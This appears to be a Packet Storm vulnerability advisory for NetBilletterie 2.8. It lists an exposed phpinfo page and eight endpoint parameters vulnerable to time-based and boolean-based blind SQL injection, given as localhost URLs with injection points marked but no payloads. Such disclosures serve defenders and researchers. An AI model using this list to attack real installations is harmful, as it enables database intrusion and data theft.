NetBilleterie version 2.8 suffers from remote SQL injection and information disclosure vulnerabilities.
67eb1173e9a47959be8afd57a92575f29b7bf96962b2ffe0ca8cac0b6a650b6a# Exploit Title: NetBilletterie 2.8 | Multiple Vulnerabilities
# Date: 14/07/16
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Vendor Homepage: https://net-billetterie.tuxfamily.org/
# Software Link: https://sourceforge.net/projects/netbilletterie/files/
# Demo Link: https://net-billetterie.tuxfamily.org/NetBilletterieDemo/login.inc.php
# Version: 2.8
# Tested on: Xampp on Windows7
# Fuzzing tool: https://github.com/Trouiller-David/PHP-Source-Code-Analysis-Tools
[phpinfo()]
################################################################
(200) => https://localhost/netbilletterie/php_info.php
################################################################
[6 SQL Injection (Type: time-based blind)]
################################################################
(200) => https://localhost/netbilletterie/lister_detail_bon.php?date_debut=*
(200) => https://localhost/netbilletterie/lister_pointes_ok.php?date_debut=*
(302) => https://localhost/netbilletterie/delete_article.php?article=*
(302) => https://localhost/netbilletterie/delete_banque.php?id_banque=*
(302) => https://localhost/netbilletterie/delete_tarif.php?id_tarif=*
(302) => https://localhost/netbilletterie/del_client.php?num=*
################################################################
[2 SQL Injection (Type: boolean-based blind)]
################################################################
(200) => https://localhost/netbilletterie/fpdf/liste_spectateurs.php?article=*
(200) => https://localhost/netbilletterie/fpdf/liste_spectateurs_attente.php?article=*
################################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed